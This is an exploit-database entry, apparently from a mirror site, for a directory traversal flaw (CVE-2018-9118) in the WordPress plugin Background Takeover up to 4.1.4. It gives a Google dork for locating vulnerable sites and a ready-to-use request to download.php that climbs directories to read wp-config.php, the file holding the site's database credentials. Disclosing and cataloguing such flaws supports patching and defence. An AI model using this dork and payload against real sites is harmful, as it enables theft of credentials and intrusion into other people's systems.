[] NeoSense
E X P L O I T S
title author type platform port cve id

WordPress Plugin Background Takeover < 4.1.4 - Directory Traversal

Author: Colette Chamberland
type: webapps
platform: php
port: 
date_added: 2018-04-09 
date_updated: 2018-07-27 
verified: 0 
codes: CVE-2018-9118 
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: WP Background Takeover, Directory Traversal <= 4.1.4
# Google Dork: inurl:/plugins/wpsite-background-takeover
# Date: 2018-03-08
# Exploit Author: Colette Chamberland, Defiant, Inc.
# Vendor Homepage: https://99robots.com
# Software Link: https://99robots.com/products/wp-background-takeover-advertisements/
# Version: <= 4.1.4
# Tested on: Wordpress 4.9.x
# CVE : CVE-2018-9118

Description

Allows for an attacker to browse files via the download.php file:

http://target[.]com/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.